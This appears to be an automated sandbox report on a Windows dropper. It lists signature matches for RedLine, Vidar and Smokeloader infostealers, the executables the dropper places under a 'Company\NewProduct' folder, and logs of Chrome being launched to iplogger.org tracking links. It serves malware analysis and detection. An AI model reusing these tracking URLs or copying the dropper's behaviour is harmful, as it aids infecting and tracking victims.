Source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.WSkT8d093C.exe.3adae14.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 33.0.brokerius.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 37.2.WW1.exe.12a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 30.0.safert44.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.0.safert44.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 29.0.real.exe.fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 29.2.real.exe.fc0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 37.0.WW1.exe.12a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 1.3.WSkT8d093C.exe.3af5a14.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000014.00000002.443247307.00000000004E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000023.00000003.402495407.0000000002291000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000001E.00000000.351377883.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: real.exe PID: 8952, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: brokerius.exe PID: 4472, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: WW1.exe PID: 6840, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: C:\Program Files (x86)\Company\NewProduct\real.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: String function: 022B94ED appears 112 times
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: String function: 00409F79 appears 112 times
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: String function: 004199E0 appears 34 times
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: String function: 00409F79 appears 112 times

Source: captain09876.exe.1.dr

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 567907 bytes, 1 file

Source: WSkT8d093C.exe

Binary or memory string: OriginalFilename vs WSkT8d093C.exe

Source: ordo_sec666.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DllResource.exe.35.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6304AF10-1308.pma

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@120/191@14/22

Source: C:\Users\user\Desktop\WSkT8d093C.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\WSkT8d093C.exe

File created: C:\Program Files (x86)\Company

Jump to behavior

Source: WSkT8d093C.exe	Virustotal: Detection: 48%
Source: WSkT8d093C.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\WSkT8d093C.exe

File read: C:\Users\user\Desktop\WSkT8d093C.exe

Jump to behavior

Source: C:\Users\user\Desktop\WSkT8d093C.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\WSkT8d093C.exe "C:\Users\user\Desktop\WSkT8d093C.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AEmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1804,i,679818058755035571,9795757180626975896,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1804,i,3887364631266855012,4134038574894975067,131072 /prefetch:8
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1816,i,10820754821841865939,13631308242641258792,131072 /prefetch:8
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1744,i,4742277565187588249,3541242475859166172,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1848,i,16283781183909954720,11832735312998177263,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1764,i,7966671234020085067,5591861156680508914,131072 /prefetch:8
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=1808,i,10803361475566917104,16647152247246369842,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1748,i,13339803577015116151,3936802353163471100,131072 /prefetch:8
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
